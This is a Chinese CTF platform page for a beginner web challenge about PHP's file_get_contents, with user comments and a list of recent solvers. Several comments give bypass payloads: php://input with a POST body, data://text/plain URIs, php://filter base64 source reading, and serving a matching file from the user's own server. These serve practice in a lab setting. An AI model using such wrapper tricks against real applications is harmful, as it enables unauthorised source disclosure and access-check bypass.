file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 3803
提  示:
描  述:
file_get_contents????
...
登录回复
评论
zdfy005 2年前
举报

POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag

回复 0
wjwjwjwcwcwc 2年前
举报

http://114.67.175.224:18854/?ac=1&fn=php://input hackbar中post赋值1

回复 0
aWxvdmVjdGY 2年前
举报

使用php://input伪协议绕过 ① 将要GET的参数?xxx=php://input ② 用post方法传入想要file_get_contents()函数返回的值 用data://伪协议绕过 将url改为:?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码 或者将url改为:?xxx=data:te

回复 2
笨笨笨蛋 2年前
举报

看到file_get_contents就应该想到用php://input 学到了

回复 1
有的是饭 2年前
举报

?ac=2&fn=data://text/plain,2 就用伪协议传入文件流,我就随便写了个2,直接出flag。

回复 3
Raki 2年前
举报

牛!

回复 1
中年七叔 2年前
举报

我是直接利用 file_get_contents可以读取远程文件内容,kali上开个http,随便创建的txt,fn传我的服务器上的这个txt,这样判断条件为真,就直接显示flag了

回复 1
我赌你的枪里没有子弹 2年前
举报

?fn=php://filter/read=convert.base64-encode/resource=index.php&ac=。。。。。。。 index.php能读取。。

回复 0
我赌你的枪里没有子弹 2年前
举报

@z007 base64_encode(file_get_contents("php://filter/read=convert.base64-encode/resource=http://114.67.175.224:16878/index.php"));

回复 0
z007 2年前
举报

你好,可以详述一下吗?ac值怎么得到index.php的base64呢?

回复 0
spiritboy 2年前
举报

伪协议作为fn秒出,呜我的金币。。。

回复 0
Inf0 3年前
举报

rnm 退钱

回复 1
落日星辰 3年前
举报

?ac=bugku&fn=flag.txt

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(5)

解题动态

xky110 攻破了该题 6小时前
wzl真帅 攻破了该题 1天前
西红柿炒番茄 攻破了该题 1天前
orange33315 攻破了该题 1天前
17634319503 攻破了该题 2天前
zhr1170 攻破了该题 2天前
124要留就要77 攻破了该题 2天前
奔跑小马 攻破了该题 2天前
2424291134 攻破了该题 4天前
网络安全亮 攻破了该题 4天前
果子酪 攻破了该题 4天前
REZE 攻破了该题 5天前
qxq233 攻破了该题 5天前
TtttttttttttT 攻破了该题 5天前
hutouyu 攻破了该题 6天前
jncajbv 攻破了该题 6天前
yiwuxiaobawang 攻破了该题 7天前
19557308305 攻破了该题 8天前
dsdqh699 攻破了该题 8天前
xxxxiaojian 攻破了该题 8天前
问题反馈